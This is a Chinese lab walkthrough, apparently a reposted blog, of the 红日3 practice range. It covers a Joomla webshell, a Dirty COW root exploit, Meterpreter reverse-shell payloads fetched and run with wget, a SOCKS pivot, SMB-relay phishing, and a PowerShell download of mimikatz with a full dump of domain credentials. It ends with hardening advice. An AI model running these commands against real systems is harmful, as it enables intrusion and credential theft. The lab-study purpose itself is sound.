红日3
环境准备
1、所有虚拟机已经自动挂起。且内网网段为192.168.93.0\24,外网网段为dhcp,不需要更改
2、修改VMnet2的ip为192.168.93.0网段,没有就创建。
因为校园网问题,桥接模式无法上网,为了方便,外网网卡改为net模式,并配置192.168.1.0网段,如下所示:
修改kail的ip以及dns
初始信息收集
扫出来了一些端口
直接访问80端口,貌似找不到有什么可利用的点。尝试目录爆破。目录爆破可以用kail自带的dirsearch、也可以尝试用awvs做一个全面的大保健。
这里利用AWVS:,其中包含目录、文件泄露
访问
拿下第一台机器
首先对
http://192.168.1.128/index.php/author-login
http://192.168.1.128/administrator/
进行暴力破解,没有成功。
但根据泄露的数据库信息,尝试连接数据库
用centos7的mysql连接失败了~~但利用Navicat Premium16成功了~
寻找用户名密码;一般都会有users字样。。发现是加盐了的md5。拉到md5网站破解,失败。但还是通过万能的互联网找到破解的方式,把密码修改为
$2y$10$EJ64ugc3YEnGH2jaM06XCO68igbTx4LpkcfVPnzoJHRy8Wm8h0Hti
明文为123456;记得保存原密码,养成习惯。当然,实战过程中,最好利用增加的用户登录。
成功进入了后台。
找到模板
创建一个新的文件:写入木马
访问/administrator/shell.php / /失败
但查看目录扫描的结果,可以猜测可能在templates/beez3/目录下
访问ip/templates/beez3/shell.php验证
通过蚁剑也成功连接
上传msf制作的shell.exe,但打开终端,发现权限太低了,根本没办法运行程序。
可能是受disable_functions的影响,利用蚁剑的disable_functions插件尝试绕过(失败了)
没办法再次求助于博客
在/tmp/mysql/ 目录下有个test.txt文件 #据说tmp文件通常有重要文件泄露
并且在前面这台机器是开启了22端口(ssh服务)
尝试进行连接,成功进行连接
发现与webshell不通用文件,所以无法找到webshell传进行的木马。本来想用xftp进行传进去,但考虑到这是个普通用户并没有权限下载ftp,于是先尝试能不能进行提权。uname -a 查看内核版本。
低于以下版本表示存在脏牛漏洞(CVE-2016-5195)
Centos7 /RHEL7 3.10.0-327.36.3.el7
Cetnos6/RHEL6 2.6.32-642.6.2.el6
Ubuntu 16.10 4.8.0-26.28
Ubuntu 16.04 4.4.0-45.66
Ubuntu 14.04 3.13.0-100.147
Debian 8 3.16.36-1+deb8u2
Debian 7 3.2.82-1
参考自脏牛(Dirty Cow)快速指南-阿里云开发者社区
于是把脏牛工具包弄到kail上,kail开启服务,然后靶机进行下载。但很神奇,下载的竟然是一个网页。只能通过压缩的形式进行下载了,但需要unzip对zip格式进行解压,万幸,靶机拥有unzip。
kail : python3 -m http.server 8000
靶机:wget http://192.168.1.123:800/dirtycow.github.io-master.zip
靶机:unzip dirtycow.github.io-master.zip -d zangniu
失败样例:
可以看到他是一个目录,但打开只有一个网页
靶机情况:
查看是否拥有gcc,没有也可以通过先编译再上传到靶机
经过无数次的踩坑:
终于找到一个成功的
GitHub - firefart/dirtycow: Dirty Cow exploit - CVE-2016-5195
同样,靶机通过kail下载出来,上面有写;
# gcc -pthread dirty.c -o dirty -lcrypt #编译
#./dirty root #因为已经存在/tmp/passwd.bak 会失败
#rm -f /tmp/passwd.bak
#./dirty root #root 为密码, ./dirty 密码
##提示信息,,他创建了一个新用户firefart,密码为root,这个用户拥有root权限
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: root
Complete line:
firefart:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash
mmap: 7fcfe9a6b000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'root'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
证明1:
[firefart@localhost dirtycow-master]# cat /etc/passwd
firefart:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash
/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
证明2:
[firefart@localhost wwwuser]# echo 123 >1.txt
[firefart@localhost wwwuser]# ls -l 1.txt
-rw-r--r--. 1 firefart root 4 Oct 7 10:17 1.txt
通过msf getshell
kail :
制作木马
#msfvemon -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.123 LPORT=444 -f elf > mshell.elf
启动监听
#msfconsole
#use exploit/multi/handler
#set lhost 192.168.1.123
#set lport 4444
#set play linux/x64/meterpreter/reverse_tcp
#run
靶机:使用刚刚提权到的firefart用户 su firefart
#wget http://192.168.1.123:8000/mshell.elf
#chmod 777 mshell.elf
#./mshell.elf
成功拿到shell
内网信息收集
meterpreter信息收集
getuid # 查看当前用户
sysinfo # 查看版本信息
run kaillav #关闭杀毒软件
ipconfig /ifconfig #收集ip信息 ,得到还有个网段192.168.93.0\24
通过icmp方式查看内网主机存活情况
[firefart@localhost wwwuser]# for i in 192.168.93.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i is alived; fi; done
192.168.93.10 is alived
192.168.93.20 is alived
192.168.93.30 is alived
192.168.93.100 is alived
192.168.93.120 is alived
接下来启用kail的socks代理
vim /etc/proxychains4.conf
└─# cat /etc/proxychains4.conf | grep socks 3 ⚙
# socks5 192.168.67.78 1080 lamer secret
# socks4 192.168.1.49 1080
# proxy types: http, socks4, socks5, raw
# ( auth types supported: "basic"-http "user/pass"-socks )
#socks4 127.0.0.1 9050 #注释原来的socks4
socks5 127.0.0.1 4444 #新增
msfconsole
use auxilxary/server/socks_proxy
show options
set srvhost 127.0.0.1 #设置ip
set srvport 4444
run
使用方法:
确保msfvenom制作的木马正常运行,扫描刚刚发现的主机
##proxychains nmap 192.168.93.10 192.168.93.20 192.168.93.30 192.168.93.120 #等待时候很漫长,甚至把session等死了
只能一个个地测量了msf6 auxiliary(server/socks_proxy) > [*] 192.168.1.128 - Meterpreter session 1 closed. Reason: Died
##
-------------------------------------内网第一台----------------------------------------------
Nmap scan report for 192.168.93.10
Host is up (0.00027s latency).
Not shown: 984 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 262.81 seconds
-------------------------------------内网第二台----------------------------------------------
└─# proxychains nmap 192.168.93.20 148 ⨯ 8 ⚙
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-12 11:18 CST
Nmap scan report for 192.168.93.20
Host is up (0.0088s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
2383/tcp open ms-olap4
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49156/tcp open unknown
-------------------------------------内网第三台----------------------------------------------
└─# proxychains nmap 192.168.93.30 8 ⚙
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-12 11:25 CST
Nmap scan report for 192.168.93.30
Host is up (0.00093s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
49152/tcp open unknown
49153/tcp open unknown
49155/tcp open unknown
49163/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 12.68 seconds
-------------------------------------内网第四台----------------------------------------------
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.15
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-12 11:26 CST
Nmap scan report for 192.168.93.120
Host is up (0.00043s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 4.91 seconds
寻找第二台主机的入口
访问 192.168.93.20 空页面
访问192.168.93.120 有内容了,先看看有没有利用的点,#熟悉的端口,熟悉的页面 (红日2) 但红日2那台有用weblogic服务~
所以只能对仅有的http服务入口了 ,搜索joomla漏洞
test1 :CVE-2015-8562 #失败
test2: CVE-2017-8917 #应该也是失败了
test3:暂无
继续回到nmap,之前发现nmap 加了命令不能执行(把session都等死了),然后一直在纠结怎么打。最后发现这样加命令能够被执行:
proxychains nmap --script=vuln 192.168.93.20 -n -Pn -vv
也没有扫出漏洞。。。没办法,再次回到博客,看看大佬们怎么打的。
因为有三台机器开启了445端口(smb文件共享服务)可以利用msf的auxiliary/scanner/smb/smb_version模块收集主机版本信息。
因为知道了对方的ip,所以这里直接每次设置一个ip,加快收集速度
ip系统信息smb版本192.168.93.10windows 2012 R23.0.2192.168.93.20windows 20082.0.2192.168.93.30Windows 72.1192.168.93.120无
用auxiliary/scanner/smb/smb_login模块尝试爆破
#user auxiliary/scanner/smb/smb_login
#show options
#set rhosts 192.168.93.10
#set SMBuser administrator
#set PASS_FILE /opt/MimiPwds.txt
好慢!!!!!大佬们都说密码是123qwe!ASD
然后我查了下我的字典中最大的一个12万多个。。。。对此我们可以
达咩,绝对达咩!!!
投机取巧那么打靶场就无意义了!!那么我们还收集了smb的版本,那么可以尝试寻找有无相关漏洞。实在找不到方法再使用”先知“技能。
ms17-010(永恒之蓝)已经可以排除,扫描的时候也没有扫到,其次看到其他大佬也没有利用,那么基本上也没有了。并且利用也很简单没必要再浪费时间。所以,主要利用smb最新的漏洞,从2020年以后的漏洞,符合以上版本条件的无需权限的都尝试一遍。
猝!
社会工程学之钓鱼:
该钓鱼方式参考自VulnStack-ATT&CK-3(红日靶场三)_Buffedon的博客-CSDN博客_红日靶场3
先把需要的impacket-master.zip拷贝到kail上
kail:
#msfvenom -p windows/meterpreter/bind_tcp lhost=192.168.1.123 lprot=4567 -e x86/shikata_ga_nai -f exe -o myshell.exe //-e是编码为了免杀
#python3 -m http.server 8000
另外再打开一个后台开启监听
#msfconsole
#use exploit/multi/handler
#set payload windows/meterpreter/bind_tcp
#set rhost 192.168.93.20
#set lprot 4567
centos6.5靶机:
#wget http://192.168.1.123:8000/myshell.exe
#wget http://192.168.1.123:8000/impacket-master.zip
#./smbrelayx.py -h 192.168.93.20 -e /opt/myshell.exe smbrelayx.py在impacket-master/examples目录。
报错了
File "./smbrelayx.py", line 1121
parser.add_argument('-s', action='store', choices={'success', 'denied', 'logon_failure'}, default='success',
^
SyntaxError: invalid syntax
# python -V
Python 2.6.6
给他搞个python3
能ping通百度,但无法下载,需要通过下面指令强行下载
#wget -c https://www.python.org/ftp/python/3.6.9/Python-3.6.9.tgz --no-check-certificate
#tar -zxvf Python-3.6.9.tgz
#cd Python-3.6.9
#./configure --prefix=/usr/local/python3 //配置、检测依赖、貌似没有报错也就是可以直接安装了
#make && make install
#ln -s /usr/local/python3/bin/python3.6 /usr/bin/python3 #建立软连接,相当于windows的快捷方式
#ln -s /usr/local/python3/bin/pip3 /usr/bin/pip
很可惜无法直接通过pip install ,因为是复制上面参考博主的,直接丢上去命令行也不知道会不会出错,一条条丢上去也麻烦,于是我们可以写一个小脚本,报出了挺多警告的,但不少error或者运行出错,都可以忽略
#vi test.sh
#sh test.sh
#nginx -s stop //因为80端口已经存在http服务,如果不停止则会冲突报错
#python3 smbrelayx.py -h 192.168.93.20 -e /opt/myshell.exe
[firefart@localhost opt]# cat test.sh
#!/bin/bash
pip install --upgrade pip -i Simple Index --trusted-host pypi.douban.com
pip install six -i Simple Index --trusted-host pypi.douban.com pycryptodomex
pip install -i Simple Index --trusted-host pypi.douban.com pyOpenSSL pip install -i Simple Index --trusted-host pypi.douban.com ldap3
pip install -i Simple Index --trusted-host pypi.douban.com pyasn1
pip install -i Simple Index --trusted-host pypi.douban.com impacket
接下来就是角色扮演了
鱼大人:访问192.168.93.100
输入账号一定是需要win2008
centos6.5靶机就抓取到了Net-NTLM Hash
但看失败了,一直没有反弹shell~~
经过排查,发现是myshell.exe并没有执行权限
于是在centos6.5执行
#chmod 777 myshell.exe
#python3 smbrelayx.py -h 192.168.93.20 -e /opt/myshell.exe
kail成功上线windows2008了
第一件事就是进行进程绑定,否则像这种脆弱的shell容易被杀死,或者centos7关闭smb服务后会断开
meterpreter >ps #查找进程
meterpreter > migrate 2084 #找一个认为比较稳定的进程进行绑定
[*] Migrating from 2912 to 2084...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > getpid
Current pid: 2084
或者可以利用post/windows/manage/migrate自动寻找合适的进程
geuid
kill X
run post/windows/manage/migrate
然后知道对面是windows,那么可以尝试使用cs 连接
kail开启cs服务端
windows客户端连接成功后创建一个监听
kail:
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set disablepayloadhandler ture
[-] The following options failed to validate: Value 'ture' is not valid for option 'DisablePayloadHandler'.
disablepayloadhandler => false
msf6 exploit(windows/local/payload_inject) > set disablepayloadhandler true
disablepayloadhandler => true
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf6 exploit(windows/local/payload_inject) > set lport 6688
lport => 6688
msf6 exploit(windows/local/payload_inject) > run
[-] Msf::OptionValidateError The following options failed to validate: SESSION
msf6 exploit(windows/local/payload_inject) > set session 2
session => 2
msf6 exploit(windows/local/payload_inject) > run
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Running module against WIN2008
[*] Spawned Notepad process 3136
[*] Injecting payload into 3136
[*] Preparing 'windows/meterpreter/reverse_http' for PID 3136
失败了,并没有在CS上上线~~~
在meterpter 执行
run autoroute -s 192.168.93.0/24
主机也能实现访问内网了
但但是无法进行联动,这个暂时就不做了
通过meterpreter收集重要信息
sysinfo #收集主机信息,保护域
getuid #查看当前权限
getsystem #提权
load mimikatz
通过kail给centos6.5靶机发送mimikatz
然后centos6.5开启http服务,让windows下载
kail:
python3 -m http.server 8000
centos6.5:
python3 -m http.server 6666
wget http://192.168.1.123:8000/mimikatz.exe
windows:在kail的meterpreter中shell操作
powershell (new-object Net.WebClient).DownloadFile('http://192.168.93.100:6666/mimikatz.exe','C:\mimikatz.exe')
随后直接通过meterpreter抓取明文密码,但在2012以后都不能直接获取明文密码了
c:\>mimikatz.exe
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 13174272 (00000000:00c90600)
Session : Interactive from 2
User Name : Administrator
Domain : TEST
Logon Server : WIN-8GA56TNV3MV
Logon Time : 12/15/2019 1:24:56 PM
SID : S-1-5-21-1528753600-3951244198-520479113-500
msv :
[00000002] Primary
* Username : Administrator
* Domain : TEST
* LM : fc5d63d71569f04399b419bc76e2eb34
* NTLM : 18edd0cc3227be3bf61ce198835a1d97
* SHA1 : 0f058e319f079c15fe3449bbeffc086cfa4d231e
tspkg :
* Username : Administrator
* Domain : TEST
* Password : zxcASDqw123!!
wdigest :
* Username : Administrator
* Domain : TEST
* Password : zxcASDqw123!!
kerberos :
* Username : Administrator
* Domain : TEST.ORG
* Password : zxcASDqw123!!
ssp :
credman :
Authentication Id : 0 ; 4192214 (00000000:003ff7d6)
Session : Interactive from 1
User Name : Administrator
Domain : WIN2008
Logon Server : WIN2008
Logon Time : 12/14/2019 7:53:47 PM
SID : S-1-5-21-3814515962-2249813874-2772841674-500
msv :
[00000002] Primary
* Username : Administrator
* Domain : WIN2008
* LM : ae946ec6f4ca785b93371dee1d5ee7e6
* NTLM : 31c1794c5aa8547c87a8bcd0324b8337
* SHA1 : 128c0272959b85b330090611169d07d85cb6bd0b
tspkg :
* Username : Administrator
* Domain : WIN2008
* Password : 123qwe!ASD
wdigest :
* Username : Administrator
* Domain : WIN2008
* Password : 123qwe!ASD
kerberos :
* Username : Administrator
* Domain : WIN2008
* Password : 123qwe!ASD
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : WIN2008$
Domain : TEST
Logon Server : (null)
Logon Time : 12/14/2019 7:49:09 PM
SID : S-1-5-20
msv :
[00000002] Primary
* Username : WIN2008$
* Domain : TEST
* NTLM : c47b1f47431b259861e615472864c698
* SHA1 : 5a09ade7dca624916c39473fd609c22302dd33bc
tspkg :
wdigest :
* Username : WIN2008$
* Domain : TEST
* Password : 94 1f 08 44 5a 0c 6d 4d dd a9 9d 09 7a d0 72 bb e9 81 69 7e 96 9f 78 74 f2 9e d3 f2 98 74 7a 2f 49 4e b7 18 01 e5 94 75 8f 57 11 44 d4 31 17 92 25 2a d4 96 73 36 95 87 ec 34 e8 96 74 8f b6 0a ef 05 17 af 2e 5b 08 f7 6c 4e ad 9c 3e b0 e1 c8 2f 8f bd e3 b2 e7 81 17 09 96 f6 75 b5 0d c1 e1 61 07 d2 a8 99 e5 5f 7d e9 0c 76 a3 7e 51 e5 f1 d0 f0 da c5 0c 88 d0 1c 59 34 b9 3e 14 ab a1 7b 56 cd 9d 67 d3 19 c7 ad d9 b2 8d 72 e9 2a c2 d0 be ff e7 e7 d2 60 85 9a 99 74 8c d5 0a b5 1c 58 31 28 de 15 51 36 58 8a da 3a db 61 5d be f9 d5 b8 a8 5c fe 19 06 f6 ac ac 26 6d 22 80 e3 f4 f6 49 f8 92 78 9b a7 36 6d f7 c4 10 a3 8e 19 83 c5 84 ff 3f fc 9c 35 81 2d 35 42 8a 30 5a 7e ca ee 3f 50 0b c8 c6 68 a8 24 cc c0 52 5e b8 37 30 b7
kerberos :
* Username : win2008$
* Domain : TEST.ORG
* Password : 94 1f 08 44 5a 0c 6d 4d dd a9 9d 09 7a d0 72 bb e9 81 69 7e 96 9f 78 74 f2 9e d3 f2 98 74 7a 2f 49 4e b7 18 01 e5 94 75 8f 57 11 44 d4 31 17 92 25 2a d4 96 73 36 95 87 ec 34 e8 96 74 8f b6 0a ef 05 17 af 2e 5b 08 f7 6c 4e ad 9c 3e b0 e1 c8 2f 8f bd e3 b2 e7 81 17 09 96 f6 75 b5 0d c1 e1 61 07 d2 a8 99 e5 5f 7d e9 0c 76 a3 7e 51 e5 f1 d0 f0 da c5 0c 88 d0 1c 59 34 b9 3e 14 ab a1 7b 56 cd 9d 67 d3 19 c7 ad d9 b2 8d 72 e9 2a c2 d0 be ff e7 e7 d2 60 85 9a 99 74 8c d5 0a b5 1c 58 31 28 de 15 51 36 58 8a da 3a db 61 5d be f9 d5 b8 a8 5c fe 19 06 f6 ac ac 26 6d 22 80 e3 f4 f6 49 f8 92 78 9b a7 36 6d f7 c4 10 a3 8e 19 83 c5 84 ff 3f fc 9c 35 81 2d 35 42 8a 30 5a 7e ca ee 3f 50 0b c8 c6 68 a8 24 cc c0 52 5e b8 37 30 b7
ssp :
credman :
Authentication Id : 0 ; 13464483 (00000000:00cd73a3)
Session : Service from 0
User Name : Administrator
Domain : WIN2008
Logon Server : WIN2008
Logon Time : 12/15/2019 1:29:22 PM
SID : S-1-5-21-3814515962-2249813874-2772841674-500
msv :
[00000002] Primary
* Username : Administrator
* Domain : WIN2008
* LM : ae946ec6f4ca785b93371dee1d5ee7e6
* NTLM : 31c1794c5aa8547c87a8bcd0324b8337
* SHA1 : 128c0272959b85b330090611169d07d85cb6bd0b
tspkg :
* Username : Administrator
* Domain : WIN2008
* Password : 123qwe!ASD
wdigest :
* Username : Administrator
* Domain : WIN2008
* Password : 123qwe!ASD
kerberos :
* Username : Administrator
* Domain : WIN2008
* Password : 123qwe!ASD
ssp :
credman :
Authentication Id : 0 ; 13172573 (00000000:00c8ff5d)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 12/15/2019 1:24:53 PM
SID :
msv :
tspkg :
wdigest :
kerberos :
* Username : Administrator
* Domain : TEST.ORG
* Password : zxcASDqw123!!
ssp :
credman :
Authentication Id : 0 ; 13083293 (00000000:00c7a29d)
Session : Service from 0
User Name : Administrator
Domain : WIN2008
Logon Server : WIN2008
Logon Time : 12/14/2019 8:16:25 PM
SID : S-1-5-21-3814515962-2249813874-2772841674-500
msv :
[00000002] Primary
* Username : Administrator
* Domain : WIN2008
* LM : ae946ec6f4ca785b93371dee1d5ee7e6
* NTLM : 31c1794c5aa8547c87a8bcd0324b8337
* SHA1 : 128c0272959b85b330090611169d07d85cb6bd0b
tspkg :
* Username : Administrator
* Domain : WIN2008
* Password : 123qwe!ASD
wdigest :
* Username : Administrator
* Domain : WIN2008
* Password : 123qwe!ASD
kerberos :
* Username : Administrator
* Domain : WIN2008
* Password : 123qwe!ASD
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 12/14/2019 7:49:09 PM
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 89285 (00000000:00015cc5)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 12/14/2019 7:49:09 PM
SID :
msv :
[00000002] Primary
* Username : WIN2008$
* Domain : TEST
* NTLM : c47b1f47431b259861e615472864c698
* SHA1 : 5a09ade7dca624916c39473fd609c22302dd33bc
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : WIN2008$
Domain : TEST
Logon Server : (null)
Logon Time : 12/14/2019 7:49:09 PM
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : WIN2008$
* Domain : TEST
* Password : 94 1f 08 44 5a 0c 6d 4d dd a9 9d 09 7a d0 72 bb e9 81 69 7e 96 9f 78 74 f2 9e d3 f2 98 74 7a 2f 49 4e b7 18 01 e5 94 75 8f 57 11 44 d4 31 17 92 25 2a d4 96 73 36 95 87 ec 34 e8 96 74 8f b6 0a ef 05 17 af 2e 5b 08 f7 6c 4e ad 9c 3e b0 e1 c8 2f 8f bd e3 b2 e7 81 17 09 96 f6 75 b5 0d c1 e1 61 07 d2 a8 99 e5 5f 7d e9 0c 76 a3 7e 51 e5 f1 d0 f0 da c5 0c 88 d0 1c 59 34 b9 3e 14 ab a1 7b 56 cd 9d 67 d3 19 c7 ad d9 b2 8d 72 e9 2a c2 d0 be ff e7 e7 d2 60 85 9a 99 74 8c d5 0a b5 1c 58 31 28 de 15 51 36 58 8a da 3a db 61 5d be f9 d5 b8 a8 5c fe 19 06 f6 ac ac 26 6d 22 80 e3 f4 f6 49 f8 92 78 9b a7 36 6d f7 c4 10 a3 8e 19 83 c5 84 ff 3f fc 9c 35 81 2d 35 42 8a 30 5a 7e ca ee 3f 50 0b c8 c6 68 a8 24 cc c0 52 5e b8 37 30 b7
kerberos :
* Username : win2008$
* Domain : TEST.ORG
* Password : 94 1f 08 44 5a 0c 6d 4d dd a9 9d 09 7a d0 72 bb e9 81 69 7e 96 9f 78 74 f2 9e d3 f2 98 74 7a 2f 49 4e b7 18 01 e5 94 75 8f 57 11 44 d4 31 17 92 25 2a d4 96 73 36 95 87 ec 34 e8 96 74 8f b6 0a ef 05 17 af 2e 5b 08 f7 6c 4e ad 9c 3e b0 e1 c8 2f 8f bd e3 b2 e7 81 17 09 96 f6 75 b5 0d c1 e1 61 07 d2 a8 99 e5 5f 7d e9 0c 76 a3 7e 51 e5 f1 d0 f0 da c5 0c 88 d0 1c 59 34 b9 3e 14 ab a1 7b 56 cd 9d 67 d3 19 c7 ad d9 b2 8d 72 e9 2a c2 d0 be ff e7 e7 d2 60 85 9a 99 74 8c d5 0a b5 1c 58 31 28 de 15 51 36 58 8a da 3a db 61 5d be f9 d5 b8 a8 5c fe 19 06 f6 ac ac 26 6d 22 80 e3 f4 f6 49 f8 92 78 9b a7 36 6d f7 c4 10 a3 8e 19 83 c5 84 ff 3f fc 9c 35 81 2d 35 42 8a 30 5a 7e ca ee 3f 50 0b c8 c6 68 a8 24 cc c0 52 5e b8 37 30 b7
ssp :
credman :
mimikatz #
域名用户密码win2008Administrator123qwe!ASDTEST.org/TESTadministratorzxcASDqw123!!
通过账号密码连接server2012的445端口得到域控的shell
(53端口的大概率是域控)
#因为 我通过meterpreter新添了路由,所以我主机也能够访问到93网段!上面有写
红日官方的任务的找到域控的文件。那么在这里就已经可以完成了~但我们的目标是getshell
先剧透一下它隐藏的文件有什么内容!!!!
经过到百度游了一圈,发现445就能getshell
通过impacket里面的脚本就能够进行getshell
首先在impacket-master里面pip install . 安装依赖
再到进入examples里面用wmiexec.py进行利用。我用python3运行没有反应~~估计这是Python2的格式
impacket-master分享
链接:百度网盘 请输入提取码 提取码:8x0z
总结:
先吐槽,这比红日2难的不是一丁半点,红日2一键梭就完事了。但是这也就给我们得到了学习提升的机会
1、渗透过程
1)通过centos6.5这台外网服务器泄露,连接到他的mysql,并且通过修改加盐的密码登录到centos6.5的后台,然后利用centos6.5后台写入木马文件,把shell反弹到kail上面去。
2)centos6.5拿到后,但权限太低,通过uname -a 发现它的内核版本符合脏牛利用条件,所以也成功提权
3)理想是打入了内网,socks代理后一顿梭就完事了,但现实很现实~~~经过网上的收集,发现只有俩个方法(当然,希望下次打的时候能够有新的方法)一个是钓鱼(本文所用),另一个是爆破(我的msf线程最大只能是1,很慢,况且我的密码top12个w都没有~。
4)利用钓鱼成功get到win2008的shell,通过层层流水,也是成功把mimikatz送入到了windows2008。
5)通过windows2008的mimikatz也是成功拿到俩个域的账户密码
6)通过server2012的445端口加上wmiexec也是成功getshell。
7)总结没想到几句话就给了结过了~~但打靶的时候也是碰碰跌跌~
2、这里也给出我的几个修复建议:
1、centos6.5部分文件特别是文件禁止其他用户读。
2、centos6.5隐藏,最好删除泄露账号密码的test.txt文件
3、centos6.5升级内核版本
4、加强员工安全意识,防止钓鱼等社工攻击~
5、windows2008安装KB 2871997
6、windows2012如果可以选择禁用445端口
7、防写入篡改,对重要且不常修改的文件设置一个定时任务,定时做一个md5验证。如/ect/passwd
3、总结之总结
本次只是拿下了window2008、cnetos6,以及windows2012的shell,虽然得到了域控,其余主机大概也不成问题了。其次获取域控的shell也有很多方法,这里应该是利用最简单的445端口。本次并没有让这些主机上线cs(尝试过但失败了,其次linux原装中并不具备这个条件),但得到2008的shell后,发现可以通过插件等方式让linux在cs上面上线(在得到centos6的shell的时候就一直找使linux在cs上线,真就有心栽花花不开····)其次windows也是没有成功,原因可能是方法不对,因为数据要经过linux系统,具体原因未知。
通过本次的靶场,也是学到了很多东西,但总体还是有些瑕疵。下次再打的时候会利用未实现的线路进行尝试,起码cs一定要上线~~~
感谢红日安全制作的靶场!!!!以及各位被我参考的博主!!
CS上线linux的方法(未实践):
cs实现上线linux主机与CrossC2的配置_Shanfenglan7的博客-CSDN博客_linux上线cs
版权归原作者 誓下 所有, 如有侵权,请联系我们删除。